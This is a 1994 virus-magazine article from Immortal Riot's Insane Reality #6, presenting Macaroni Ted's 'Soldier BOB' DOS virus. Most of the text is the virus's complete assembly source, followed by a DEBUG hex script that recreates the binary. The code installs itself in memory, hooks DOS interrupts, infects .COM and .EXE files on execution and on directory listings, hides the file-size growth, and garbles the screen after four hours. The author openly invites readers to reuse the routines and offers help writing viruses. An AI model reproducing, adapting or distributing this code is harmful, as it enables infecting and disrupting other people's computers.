Insane Reality issue #6 - (c)opyright 1994 Immortal Riot File 013 % Soldier Bob % Here is Macaroni Ted's latest virus. Even though this do not show his fully capacity, I find it an excellent virus. I think this is some kinda beta version of a future release from him, hence - check all the ;remarks, non-finished interrupt handlers, and 'mov reg,0', etc. and you'll get my point. This virus was compiled, and commented in a quick hurry, just bcos that I wanted to include it (a nice tradition..) in our magazine. The name (Soldier Bob) suprised me a bit, bcos after the death of Kurt Cobain in Nirvana (well, he still lives in my heart..), he told me that he should dedication a virus to his honour. But oh well? :). MT (Modus Tollus or Macaroni Ted, that is the question?.. :)), are to be _highly_ saluted for this effort, and I hope you'll enjoy it. - TU -------------------------------------------------------------------------------- .model tiny .code org 100h ; I made this virus for several month ago, then I forgott it. I recently found ; it on my harddrive, and I compiled it and tried it. To my amazement it worked! ; ; Soldier BOB infects .COM and .EXE files when you execute a file. It also ; saves up to 20 files into a buffer when you use the dos-command 'DIR'. And ; later when dos is counting how much diskspace that's free Soldier BOB will ; infect all files stored into the buffer. Filesize increases are hidden. ; When Soldier BOB has been resident for four hours it will fuck-up the whole ; screen. Try this routine, it's fun to see when your screen being totally mad. ; ; I don't really know exactly what Soldier BOB does because I haven't time to ; figure out all details, but since I've brought the source code, you are free ; to investigate that by yourself. ; ; Please feel free to rip routines and ideas from this source-code. My purpose ; is that everybody (who wants to) can be able to learn how to write a decent ; virus. ; ; If you need any help to write a virus, please do not hesitate to contact ; me on Internet. ; ; - regards, Macaroni Ted / A.N.O.I - 11-27-94 ;(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=); ; A NEW ORDER OF INTELLIGENCE PRESENTS: ; ; ; ; S O L D I E R B O B ; ; ; ; Copyright (c) Jan-Mar 1994 by Macaroni Ted / A.N.O.I. ; ; ; ;(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=)=(=); start: call get_bp get_bp: pop bp mov ax,0ff4eh ;(?N-) int 21h cmp ax,4f49h ;(-OI) je already_res push ds es mov ah,2ch int 21h add ch,4 mov cs:start_time,ch call hook_memory push es pop ds call hook_interrupts pop es ds already_res: cmp word ptr cs:[bp+(exe_header-get_bp)],'ZM' je exit_exe exit_com: lea si,[bp+(exe_header-get_bp)] mov di,100h cld movsb movsb movsb movsb movsb xor ax,ax mov bx,ax mov cx,ax mov dx,ax mov si,ax mov di,ax push cs push 100h retf exit_exe: mov ax,es ;to code seg add ax,10h add ax,word ptr cs:[bp+(exe_header+16h-get_bp)] push ax push word ptr cs:[bp+(exe_header+14h-get_bp)] retf original_int21h dd ? original_int1Bh dd ? original_int09h dd ? original_int1Ch dd ? start_time db ? db 'Soldier BOB - (c)jan-94 by A:N:O:I',10,13 db 'Programmed by Macaroni Ted' hook_memory: push ds push cs pop ds mov cx,es dec cx mov es,cx mov bx,word ptr es:[3h] mov dx,virlen mov cl,4 shr dx,cl add dx,4 mov cx,es sub bx,dx inc cx mov es,cx mov ah,4ah int 21h ; jc exit_com mov ah,48h dec dx mov bx,dx ;it's done int 21h ; jc exit_com dec ax mov es,ax mov cx,8h mov word ptr es:[1h],cx sub ax,0fh mov di,100h ;begin of virus mov es,ax lea si,[bp+(start-get_bp)] mov cx,virlen ;<=== virus len cld repne movsb pop ds ret hook_interrupts: ;int 21h mov ax,3521h int 21h mov word ptr [original_int21h],bx mov word ptr [original_int21h+2],es mov ax,2521h lea dx,new_int_21h int 21h mov ax,351ch ;int 1Ch int 21h mov word ptr [original_int1ch],bx mov word ptr [original_int1ch+2],es mov ax,251ch lea dx,new_int_1ch int 21h ret push_all: pop cs:tmp_adr push ax push bx push cx push dx push si push di push bp push ds push es jmp word ptr cs:tmp_adr tmp_adr dw ? db 'Soldier BOB - Made in Sweden' pop_all: pop cs:tmp_adr pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax jmp word ptr cs:tmp_adr int21h: pushf call dword ptr cs:original_int21h retn scroll: ;input ax push bx dx cx ax mov dx,3D4h push ax and al,0Fh mov ah,8 xchg al,ah out dx,ax pop ax mov cl,4 shr ax,cl mov cx,50h mul cx mov cl,al mov al,0Ch mov dx,3D4h out dx,ax mov ah,cl inc al out dx,ax pop ax cx dx bx ret ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ; Int 21h ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- new_int_21h: pushf call push_all mov ah,2ch call int21h mov cs:time_h,ch call pop_all cmp ah,4bh ;execute je execute_file cmp ah,11h ;fool dir je find__ cmp ah,12h je find__ cmp ah,4eh ;dos 2.x je find_ cmp ah,4fh je find_ cmp ah,36h ;get free space je get_free_space cmp ax,0ff4eh ;mem check (?N) je mem_check exit_21h: popf jmp dword ptr cs:original_int21h mem_check: mov ax,4f49h ;(OI) popf iret find_: jmp find_new find__: jmp find_old file_date dw ? file_time dw ? file_size1 dw ? file_size2 dw ? attribute dw ? mask_com db '*.com',0 mask_exe db '*.exe',0 infected_files dw 0 execute_file: call infect ;infect ds:dx jmp exit_21h get_free_space: call push_all push cs cs pop ds es lea si,file_buffer restore_buffer: lodsb cmp al,0ffh ;end of buffer je done_infecting dec si push si ;infect it mov dx,si call infect pop si get_eo_name: lodsb cmp al,0ffh je done_infecting or al,al jnc get_eo_name jmp restore_buffer done_infecting: mov byte ptr cs:[file_buffer],0ffh ;clear buffer call pop_all jmp exit_21h find_old: popf call int21h cmp al,0ffh jne push_it jmp no_more_files push_it: call push_all mov ah,2fh ;get dta int 21h push es ;es:bx pop ds ;ds:bx mov si,bx ;ds:si add si,16 ;ext name lodsw mov dx,ax lodsb cmp dx,'OC' ;ext=COM? jne check_exe cmp al,'M' jne check_exe jmp ext_ok check_exe: cmp dx,'XE' ;ext=EXE? jne cancel_ff cmp al,'E' jne cancel_ff ext_ok: ; mov si,bx ; add si,38 ; lodsw ; cmp ax,0 ; jne cancel_ff mov si,bx ;check if already infected add si,30 lodsw ;time and al,00011111b cmp al,14 je infected ;already infected (sec=28) push cs pop es lea di,file_buffer mov cx,260 get_end_of_buffer: mov al,byte ptr es:[di] cmp al,0ffh ;end of buffer? je end_of_buffer inc di loop get_end_of_buffer end_of_buffer: cmp cx,14 jb cancel_ff mov si,bx add si,8 ;filename mov cx,8 copy_filename: lodsb cmp al,20h je copy_filename_klar stosb loop copy_filename copy_filename_klar: mov al,'.' stosb mov si,bx ;copy ext add si,16 movsb movsb movsb mov al,0 stosb mov al,0ffh stosb jmp cancel_ff infected: mov si,bx ;alter size add si,36 mov di,si lodsw sub ax,virlen jz cancel_ff stosw cancel_ff: call pop_all no_more_files: retf 2 ;iret flags find_new: popf call int21h jnc more_files retf 2 more_files: pushf call push_all mov ah,2fh ;get dta int 21h push es ;es:bx pop ds ;ds:bx mov si,bx ;ds:si add si,1eh ;filename get_ext: lodsb or al,al jnz get_ext sub si,4 lodsw cmp ax,'XE' je check_E cmp ax,'OC' je check_M cmp ax,'xe' je check_e cmp ax,'oc' je check_m jmp cancel_new check_E: lodsb cmp al,'E' je ext_is_ok cmp al,'e' je ext_is_ok jmp cancel_new check_M: lodsb cmp al,'M' je ext_is_ok cmp al,'m' je ext_is_ok jmp cancel_ff ext_is_ok: mov si,bx add si,16h lodsw ;time and al,00011111b cmp al,14 je infected2 ;already infected (sec=28) mov dx,bx add dx,1eh call infect jmp cancel_new infected2: mov si,bx add si,1ah mov di,si lodsw ;alter size sub ax,virlen jz cancel_new stosw cancel_new: call pop_all popf retf 2 infect: call push_all mov si,dx mov ax,4300h ;get attrib int 21h mov cs:attribute,cx ;save it xor cx,cx mov ax,4301h ;force all attribs int 21h ; mov ax,6C00h ;open file ; mov bx,0010000011000010b ;read/write disable int 24h ; mov dx,0000000000010001b ;error if not found, != open ; int 21h mov ax,3d02h mov dx,si int 21h mov bx,ax push cs cs pop ds es mov ah,57h ;get file date/time mov al,0 int 21h mov file_date,dx mov file_time,cx mov ah,3fh ;read (exe) header mov cx,1ch lea dx,exe_header int 21h cmp word ptr [exe_header+12h],'IA' ;already infected(exe) jne check_com jmp close_file check_com: cmp word ptr [exe_header],'IA' ;already infected(com) jne goto_end jmp close_file goto_end: mov ax,4202h ;goto end of file mov cx,0 mov dx,0 int 21h mov file_size1,ax mov file_size2,dx mov ah,40h lea dx,start mov cx,virlen int 21h mov ax,4200h mov cx,0 mov dx,0 int 21h cmp word ptr [exe_header],'ZM' jne infect_com jmp infect_exe infect_com: cmp file_size2,0 jne close_file mov ax,file_size1 sub ax,5 mov jmp_2,ax mov ah,40h mov cx,5 lea dx,jmp_1 int 21h jmp close_file infect_exe: mov ax,4202h mov dx,0 mov cx,0 int 21h mov cx,200h ;512 div cx inc ax mov word ptr [exe_header+2],dx mov word ptr [exe_header+4],ax mov ax,file_size1 ;old file size mov dx,file_size2 mov cx,10h div cx sub ax,word ptr [exe_header+8h] mov word ptr ds:[exe_header+16h],ax mov word ptr ds:[exe_header+14h],dx mov word ptr [exe_header+12h],'IA' mov ax,4200h mov dx,0 mov cx,0 int 21h mov ah,40h ;write exe header mov cx,1Ch lea dx,exe_header int 21h close_file: mov dx,file_date mov cx,file_time and cl,11100000b or cl,00001110b ;secs = 28 mov ax,5701h ;set time/date int 21h mov ah,3eh ;close file int 21h call pop_all call push_all ;restore filename mov ax,4301h ;set attrib original attrib mov cx,cs:attribute int 21h call pop_all ret exe_header db 41h,49h,90h,0cdh,20h ;5 first bytes db 1Ch-5 dup(0) ;28 jmp_1 db 41h,49h ;inc cx, dec cx db 0e9h ;jmp jmp_2 dw ? ;xxxx file_buffer db 0ffh,259 dup(0) ;20 filename 12345678.123,0 ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ; Int 1Bh ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- new_int_1Bh: ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ; Int 09h ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- new_int_09h: ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ; Int 1Ch ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- new_int_1Ch: call push_all mov al,cs:start_time cmp al,cs:time_h jne exit_1ch jmp rave_it exit_1Ch: call pop_all jmp dword ptr cs:original_int1Ch time_h db 0 scroll_pos dw 32 ;bx do_inc dw 0 ;dx rave_it: inc cs:do_inc cmp cs:do_inc,3 jne dont_high mov cs:do_inc,0 inc cs:scroll_pos dont_high: mov cx,cs:scroll_pos mov ax,0 scroll_1: call scroll inc ax loop scroll_1 mov cx,cs:scroll_pos add cx,cx scroll_2: call scroll dec ax loop scroll_2 jmp rave_it virlen equ offset eof - offset start eof: end start N bob.com E 100 E8 00 00 5D B8 4E FF CD 21 3D 49 4F 74 18 1E 06 E 110 B4 2C CD 21 80 C5 04 2E 88 2E 75 01 E8 95 00 06 E 120 1F E8 D7 00 07 1F 2E 81 BE 3F 04 4D 5A 74 25 8D E 130 B6 3F 04 BF 00 01 FC A4 A4 A4 A4 A4 33 C0 8B D8 E 140 8B C8 8B D0 8B F0 8B F8 0E 50 55 8B EC C7 46 02 E 150 00 01 5D CB 8C C0 05 10 00 2E 03 86 55 04 50 2E E 160 FF B6 53 04 CB 00 00 00 00 00 00 00 00 00 00 00 E 170 00 00 00 00 00 00 53 6F 6C 64 69 65 72 20 42 4F E 180 42 20 2D 20 28 63 29 6A 61 6E 2D 39 34 20 62 79 E 190 20 41 3A 4E 3A 4F 3A 49 0A 0D 50 72 6F 67 72 61 E 1a0 6D 6D 65 64 20 62 79 20 4D 61 63 61 72 6F 6E 69 E 1b0 20 54 65 64 1E 0E 1F 8C C1 49 8E C1 26 8B 1E 03 E 1c0 00 BA C8 05 B1 04 D3 EA 83 C2 04 8C C1 2B DA 41 E 1d0 8E C1 B4 4A CD 21 B4 48 4A 8B DA CD 21 48 8E C0 E 1e0 B9 08 00 26 89 0E 01 00 2D 0F 00 BF 00 01 8E C0 E 1f0 8D 76 FD B9 C8 05 FC F2 A4 1F C3 B8 21 35 CD 21 E 200 89 1E 65 01 8C 06 67 01 B8 21 25 BA 9C 02 CD 21 E 210 B8 1C 35 CD 21 89 1E 71 01 8C 06 73 01 B8 1C 25 E 220 BA 67 06 CD 21 C3 2E 8F 06 39 02 50 53 51 52 56 E 230 57 55 1E 06 2E FF 26 39 02 00 00 53 6F 6C 64 69 E 240 65 72 20 42 4F 42 20 2D 20 4D 61 64 65 20 69 6E E 250 20 53 77 65 64 65 6E 2E 8F 06 39 02 07 1F 5D 5F E 260 5E 5A 59 5B 58 2E FF 26 39 02 9C 2E FF 1E 65 01 E 270 C3 53 52 51 50 BA D4 03 50 24 0F B4 08 86 C4 EF E 280 58 B1 04 D3 E8 B9 50 00 F7 E1 8A C8 B0 0C BA D4 E 290 03 EF 8A E1 FE C0 EF 58 59 5A 5B C3 9C E8 86 FF E 2a0 B4 2C E8 C5 FF 2E 88 2E 7F 06 E8 AA FF 80 FC 4B E 2b0 74 46 80 FC 11 74 27 80 FC 12 74 22 80 FC 4E 74 E 2c0 1A 80 FC 4F 74 15 80 FC 36 74 32 3D 4E FF 74 06 E 2d0 9D 2E FF 2E 65 01 B8 49 4F 9D CF E9 D9 00 EB 4A E 2e0 00 00 00 00 00 00 00 00 00 00 2A 2E 63 6F 6D 00 E 2f0 2A 2E 65 78 65 00 00 00 E8 34 01 EB D3 E8 26 FF E 300 0E 0E 1F 07 BE 63 05 AC 3C FF 74 13 4E 56 8B D6 E 310 E8 1C 01 5E AC 3C FF 74 06 0A C0 73 F7 EB E8 2E E 320 C6 06 63 05 FF E8 2F FF EB A6 9D E8 3C FF 3C FF E 330 75 03 E9 7F 00 E8 EE FE B4 2F CD 21 06 1F 8B F3 E 340 83 C6 10 AD 8B D0 AC 81 FA 43 4F 75 06 3C 4D 75 E 350 02 EB 0A 81 FA 45 58 75 58 3C 45 75 54 8B F3 83 E 360 C6 1E AD 24 1F 3C 0E 74 3A 0E 07 BF 63 05 B9 04 E 370 01 26 8A 05 3C FF 74 03 47 E2 F6 83 F9 0E 72 31 E 380 8B F3 83 C6 08 B9 08 00 AC 3C 20 74 03 AA E2 F8 E 390 B0 2E AA 8B F3 83 C6 10 A4 A4 A4 B0 00 AA B0 FF E 3a0 AA EB 0E 8B F3 83 C6 24 8B FE AD 2D C8 05 74 01 E 3b0 AB E8 A3 FE CA 02 00 9D E8 AF FE 73 03 CA 02 00 E 3c0 9C E8 62 FE B4 2F CD 21 06 1F 8B F3 83 C6 1E AC E 3d0 0A C0 75 FB 83 EE 04 AD 3D 45 58 74 11 3D 43 4F E 3e0 74 17 3D 65 78 74 07 3D 63 6F 74 0D EB 3A AC 3C E 3f0 45 74 11 3C 65 74 0D EB 2F AC 3C 4D 74 06 3C 6D E 400 74 02 EB AD 8B F3 83 C6 16 AD 24 1F 3C 0E 74 0A E 410 8B D3 83 C2 1E E8 17 00 EB 0E 8B F3 83 C6 1A 8B E 420 FE AD 2D C8 05 74 01 AB E8 2C FE 9D CA 02 00 E8 E 430 F4 FD 8B F2 B8 00 43 CD 21 2E 89 0E E8 02 33 C9 E 440 B8 01 43 CD 21 B8 02 3D 8B D6 CD 21 8B D8 0E 0E E 450 1F 07 B4 57 B0 00 CD 21 89 16 E0 02 89 0E E2 02 E 460 B4 3F B9 1C 00 BA 42 05 CD 21 81 3E 54 05 41 49 E 470 75 03 E9 A2 00 81 3E 42 05 41 49 75 03 E9 97 00 E 480 B8 02 42 B9 00 00 BA 00 00 CD 21 A3 E4 02 89 16 E 490 E6 02 B4 40 BA 00 01 B9 C8 05 CD 21 B8 00 42 B9 E 4a0 00 00 BA 00 00 CD 21 81 3E 42 05 4D 5A 75 02 EB E 4b0 1C 83 3E E6 02 00 75 5F A1 E4 02 2D 05 00 A3 61 E 4c0 05 B4 40 B9 05 00 BA 5E 05 CD 21 EB 4A B8 02 42 E 4d0 BA 00 00 B9 00 00 CD 21 B9 00 02 F7 F1 40 89 16 E 4e0 44 05 A3 46 05 A1 E4 02 8B 16 E6 02 B9 10 00 F7 E 4f0 F1 2B 06 4A 05 A3 58 05 89 16 56 05 C7 06 54 05 E 500 41 49 B8 00 42 BA 00 00 B9 00 00 CD 21 B4 40 B9 E 510 1C 00 BA 42 05 CD 21 8B 16 E0 02 8B 0E E2 02 80 E 520 E1 E0 80 C9 0E B8 01 57 CD 21 B4 3E CD 21 E8 26 E 530 FD E8 F2 FC B8 01 43 2E 8B 0E E8 02 CD 21 E8 16 E 540 FD C3 41 49 90 CD 20 00 00 00 00 00 00 00 00 00 E 550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 49 E 560 E9 00 00 FF 00 00 00 00 00 00 00 00 00 00 00 00 E 570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 5f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 660 00 00 00 00 00 00 00 E8 BC FB 2E A0 75 01 2E 3A E 670 06 7F 06 75 02 EB 0D E8 DD FB 2E FF 2E 71 01 00 E 680 20 00 00 00 2E FF 06 82 06 2E 83 3E 82 06 03 75 E 690 0C 2E C7 06 82 06 00 00 2E FF 06 80 06 2E 8B 0E E 6a0 80 06 B8 00 00 E8 C9 FB 40 E2 FA 2E 8B 0E 80 06 E 6b0 03 C9 E8 BC FB 48 E2 FA EB CA RCX 5ba W Q